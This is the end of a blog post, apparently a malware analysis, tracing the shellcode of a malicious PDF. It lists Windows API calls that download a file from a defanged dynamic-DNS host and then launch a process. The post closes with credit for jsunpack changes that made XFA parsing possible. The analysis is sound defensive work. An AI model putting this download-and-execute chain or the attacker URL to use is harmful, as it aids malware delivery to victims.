urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
advapi32.OpenProcessToken()
shell32.ShellExecuteExW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()
For Windows XP and earlier, the net result is the same, there are just different DLL functions called.
kernel32.VirtualAlloc()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
kernel32.CreateProcessW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()


This analysis was possible because of the changes we made in pdf.py in jsunpack. We added support for detecting XFA objects and then parsing the XML data to extract the JavaScript and the rawValue data associated with it. Again, these modifications have been shared back to the jsunpack project.
Post written by David Dorsey of Visiblerisk, Inc.

沒有留言:

張貼留言